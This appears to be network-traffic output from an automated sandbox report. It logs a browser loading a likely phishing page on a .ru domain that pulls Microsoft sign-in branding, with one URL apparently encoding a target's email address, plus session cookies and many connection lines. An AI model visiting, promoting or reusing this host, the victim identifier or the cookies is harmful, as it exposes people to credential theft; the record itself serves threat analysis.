          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1369030472:1705508754:EmThWJxmRohva1owlnsvJ5GEpCR6N4Hxvwfz_SQ26Ik/847008825fbf8ce0/150b112ab8f1d86 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1369030472:1705508754:EmThWJxmRohva1owlnsvJ5GEpCR6N4Hxvwfz_SQ26Ik/847008825fbf8ce0/150b112ab8f1d86 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://2r1.nhvw4is.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /0wNwOpkNampQzdEFzER HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29t HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://2r1.nhvw4is.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6YvderOtk6O0M7sgzYT/1TKDqCvavBzEg6KKXO HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6kdJWQxCSur7B561nIxE0tXq/7hO4txYoEI6eUd HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6l64ynJdPgQDe/8BAggoRS3IGfgVQWqQrsKqAmU HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6ei9bANZ0chH/5yGHYxSRxnr32lWFLaZnuzyZ2fRMM HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/632Jy30VDgVHr39mjZbPAQ/3u0Xn2q2wkzfexbzQNTGlXRdtH HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6RUb6zvmV0n/6rUQnzSbGLvo HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/632Jy30VDgVHr39mjZbPAQ/3u0Xn2q2wkzfexbzQNTGlXRdtH HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6RUb6zvmV0n/6rUQnzSbGLvo HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6ei9bANZ0chH/5yGHYxSRxnr32lWFLaZnuzyZ2fRMM HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6r1OvgEPyH9fqusm1kFxOY9HI7jFC/2GXuLuN6KqlYKs49PJP4M HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6MipOpOZrol77bJu4Jez1PxICsw/2eVSshKvifDU HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/3tDjnOJo1wyWZPuEmK2mWIfU HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6MipOpOZrol77bJu4Jez1PxICsw/2eVSshKvifDU HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6r1OvgEPyH9fqusm1kFxOY9HI7jFC/2GXuLuN6KqlYKs49PJP4M HTTP/1.1Host: 2r1.nhvw4is.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
          Source: global trafficHTTP traffic detected: GET /dbd5a2dd-ycck-qdgvaobjxiczh0sbj8queqtpxrg5wachki5wdu/logintenantbranding/0/bannerlogo?ts=636408265539890963 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2r1.nhvw4is.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /dbd5a2dd-ycck-qdgvaobjxiczh0sbj8queqtpxrg5wachki5wdu/logintenantbranding/0/bannerlogo?ts=636408265539890963 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dGeXFcO742e+8lY&MD=v78ASCbe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000089B3D0D603 HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
          Source: unknownDNS traffic detected: queries for: clients2.google.com
          Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jan 2024 16:39:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9GwSSkYMo178kButyz32jlFvXFXyc0jsaLG9pP6Vz2pv4%2Fb4cKwYHKz0wzJsq4kWAUVGpYZGM%2B87tChGA2CdA1Hyh9K1k0XQHGEr8O2%2BVf51ENqSMJGcR7LkNOj4M43CtQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8470084a891b428f-EWRalt-svc: h3=":443"; ma=86400
          Source: chromecache_93.2.drString found in binary or memory: https://getbootstrap.com/)
          Source: chromecache_93.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
